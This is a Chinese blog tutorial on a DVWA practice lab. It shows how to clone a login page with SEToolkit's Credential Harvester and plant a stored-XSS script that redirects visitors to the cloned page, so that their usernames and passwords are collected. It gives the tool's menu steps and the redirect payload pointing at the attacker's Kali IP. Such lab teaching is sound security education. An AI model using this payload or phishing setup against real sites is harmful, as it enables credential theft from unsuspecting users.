Web安全-XSS-基础04

一、盗取用户信息原理

首先克隆网站登录页面,利用存储XSS设置跳转代码,如果用户访问即跳转到克隆的登录页面,用户输入登录,账号和密码被存储。
在这里插入图片描述
1、用户登陆网站,我们实现利用网站的存储型xss漏洞,设置好跳转链接
2、当用户访问到XSS处,页面跳转到克隆的登陆界面
3、此时若用户进一步输入账号密码,那么我们的目的就达成了!

二、测试

2.1 克隆登陆网站

此处以dvwa登陆界面为例

在这里插入图片描述

下一步我们就需要克隆该站点:

这里需要用到kali下的setoolkit工具
SEToolkit使用流程:

  1. sudo setooklit (打开setookit工具)
  2. 选择Social-Engineering Attacks
  3. 选择Website Attack Vectors
  4. 选择Credential Harvester Attack Method
  5. 选择Site Cloner,输入要克隆的网址

输入网址那一步时,先回车,再输入我们想要克隆的站点链接
在这里插入图片描述
在这里插入图片描述
此时已经克隆完成!

浏览器访问kali的IP地址即可!
伪站点url:192.168.137.128也就是kali的ip地址
在这里插入图片描述

2.2 利用XSS漏洞盗取用户信息

构建payload,依旧以dvwa为例
在存储型xss漏洞处:

<script>window.location="http://192.168.137.128/"</script>

使网页重定向到我们的伪站点

在这里插入图片描述
直接跳转到了我们自己克隆的站点了
在这里插入图片描述
输入用户名和密码后不会有反应,回到kali可以发现用户名和密码
在这里插入图片描述
参考链接:
https://blog.csdn.net/qq_45884195/article/details/107136606

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值